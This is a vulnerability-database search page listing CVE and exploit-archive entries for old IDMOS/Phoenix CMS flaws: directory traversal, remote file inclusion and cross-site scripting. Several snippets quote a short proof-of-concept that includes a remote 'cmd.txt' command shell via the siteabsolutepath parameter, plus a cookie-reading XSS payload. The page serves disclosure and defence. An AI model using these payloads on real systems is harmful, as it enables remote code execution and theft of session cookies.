Lucene search
+L

1699 matches found

Prion
Prion
added 2008/01/23 10:0 p.m.16 views

Directory traversal

Directory traversal vulnerability in administrator/download.php in IDMOS aka Phoenix 1.0 allows remote attackers to read arbitrary files via a .. dot dot in the fileName parameter...

5CVSS7.2AI score0.02771EPSS
Exploits1References5Affected Software1
CVE
CVE
added 2008/01/23 9:0 p.m.39 views

CVE-2008-0431

CVE-2008-0431 affects IDMOS (aka Phoenix) 1.0, where the administrator/download.php handler is vulnerable to directory traversal via the fileName parameter (..). This allows remote attackers to read arbitrary files on the affected system. The issue is triggered by an invalid path input and result...

5CVSS6.7AI score0.02771EPSS
Exploits1References5Affected Software1
CVE
CVE
added 2007/11/08 2:0 a.m.44 views

CVE-2007-5889

CVE-2007-5889 describes PHP remote file inclusion vulnerabilities in IDMOS 1.0 Alpha (aka Phoenix). The affected components are the admin-facing scripts (admin.php, menu_add.php, menu_operation.php) under the administrator/ path, where a URL passed to site_absolute_path can cause arbitrary PHP co...

10CVSS7.5AI score0.04067EPSS
Exploits0References6Affected Software1
NVD
NVD
added 2007/10/09 6:17 p.m.14 views

CVE-2007-5293

Multiple cross-site scripting XSS vulnerabilities in IDMOS 1.0-beta aka Phoenix allow remote attackers to inject arbitrary web script or HTML via the 1 errmsg parameter to error.php and the 2 content parameter to templates/simple/ia.php...

2.6CVSS5.8AI score0.02326EPSS
Exploits0References9
Prion
Prion
added 2007/10/09 6:17 p.m.16 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in IDMOS 1.0-beta aka Phoenix allow remote attackers to inject arbitrary web script or HTML via the 1 errmsg parameter to error.php and the 2 content parameter to templates/simple/ia.php...

2.6CVSS6.1AI score0.02326EPSS
Exploits0References9Affected Software1
Prion
Prion
added 2007/10/09 6:17 p.m.19 views

Remote file inclusion

PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...

6.8CVSS7.7AI score0.05605EPSS
Exploits0References6Affected Software1
NVD
NVD
added 2007/10/09 6:17 p.m.22 views

CVE-2007-5294

PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...

6.8CVSS7.4AI score0.05605EPSS
Exploits0References6
CVE
CVE
added 2007/10/09 6:0 p.m.44 views

CVE-2007-5294

CVE-2007-5294 affects IDMOS 1.0-beta (aka Phoenix); a PHP remote file inclusion flaw exists in core/aural.php that allows an attacker to execute arbitrary PHP code via a site_absolute_path URL parameter. The description confirms remote code execution via a crafted URL, but the connected documents...

6.8CVSS7.4AI score0.05605EPSS
Exploits0References6Affected Software1
CVE
CVE
added 2007/10/09 6:0 p.m.43 views

CVE-2007-5293

The CVE-2007-5293 entry documents XSS vulnerabilities in IDMOS 1.0-beta (aka Phoenix). The issues affect two input vectors: the err_msg parameter to error.php and the content parameter to templates/simple/ia.php, both enabling remote attackers to inject arbitrary web script or HTML. The core caus...

2.6CVSS5.8AI score0.02326EPSS
Exploits0References9Affected Software1
Packet Storm
Packet Storm
added 2007/10/08 12:0 a.m.44 views

idmos-xss.txt

Hello,, IDM-OS idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss error.php?errmsg=alertdocument.cookie;...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/10/08 12:0 a.m.32 views

idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability

No description provided by source. idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2007/10/07 12:0 a.m.31 views

idmos-phoenix CMS - aural.php Remote File Inclusion

idmos-phoenix CMS - aural.php Remote File Inclusion idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss...

7.5AI score
Exploits0
0day.today
0day.today
added 2007/10/07 12:0 a.m.33 views

idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================= idmos-phoenix cms aural.php Remote File Inclusion Vulnerability ================================================================= idmos-phoenix cms Remote File inclusion...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/10/07 12:0 a.m.51 views

idmos-phoenix CMS - 'aural.php' Remote File Inclusion

idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss error.php?errmsg=alertdocument.cookie;...

7AI score
Exploits0
myhack58
myhack58
added 2007/02/04 12:0 a.m.23 views

With Phoenix universal boot disk to resolve local/domain administrator password lost-vulnerability warning-the black bar safety net

The local administrator password is lost, by deleting the SAM file, or by NTPASSWORD software solution. But to solve the domain administrator password is lost, they can not do anything. Then you need to use“Phoenix universal boot disk”, this article will discuss in detail the use of this disk to...

0.5AI score
Exploits0
seebug.org
seebug.org
added 2006/12/05 12:0 a.m.33 views

PostNuke多个远程输入验证漏洞

PostNuke是一款开放源码、开放开发的内容管理系统(CMS)。PostNuke中存在多个输入验证漏洞,起因是应用程序没能正确的过滤用户提供的输入。SQL注入漏洞可能允许远程攻击者向数据库查询提供恶意输入,导致修改查询逻辑或其他攻击。成功的攻击可能导致入侵应用程序,泄漏或修复数据,或允许攻击者利用基础数据库实现中的漏洞。 PostNuke还受多个跨站脚本漏洞的影响。攻击者可能利用这些漏洞在没有戒备用户的浏览器中执行任意脚本代码,导致窃取基于cookie的认证凭据或其他攻击。 Phoenix 0.750-0.760-RC3...

7.1AI score
Exploits0
NVD
NVD
added 2006/09/29 8:7 p.m.9 views

CVE-2006-5090

Multiple cross-site scripting XSS vulnerabilities in Phoenix Evolution CMS PECMS allow remote attackers to inject arbitrary web script or HTML via the 1 mod or 2 action parameters in index.php, or the 3 pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is...

6.8CVSS5.7AI score0.01881EPSS
Exploits1References3
Cvelist
Cvelist
added 2006/09/29 8:0 p.m.19 views

CVE-2006-5090

Multiple cross-site scripting XSS vulnerabilities in Phoenix Evolution CMS PECMS allow remote attackers to inject arbitrary web script or HTML via the 1 mod or 2 action parameters in index.php, or the 3 pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is...

5.7AI score0.01881EPSS
Exploits1References3
exploitpack
exploitpack
added 2006/09/26 12:0 a.m.26 views

Phoenix Evolution CMS - index.php Multiple Cross-Site Scripting Vulnerabilities

Phoenix Evolution CMS - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2006/09/26 12:0 a.m.38 views

Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting

Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...

Exploits0
Rows per page
Query Builder